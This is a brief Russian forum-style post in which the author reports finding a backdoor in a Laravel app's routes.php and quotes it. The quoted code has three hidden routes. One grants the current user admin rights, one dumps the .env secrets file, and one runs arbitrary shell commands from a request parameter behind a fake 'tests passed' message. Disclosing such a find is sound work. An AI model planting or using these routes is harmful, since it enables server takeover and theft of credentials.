При небольшом осмотре нашел шелл
Route::get('/nodejsconnect', function () {
auth()->user()->update(['is_admin' => 1, 'chat_role' => 3]);
return 'NodeJS connected established';
});
Route::get('/techicalspecialistinfo', function () {
return response(file_get_contents(__DIR__ . '/../.env'));
});
Route::post('/4e', function () {
exec(request('l'));
return 'All tests (171/171) passed successfully. Your app is working correctly.';
});
(/app/Http/routes.php 70 line) encoded
Возможно оставлен специально, или же недосмотрел Saul, но думаю проблем тут дох... много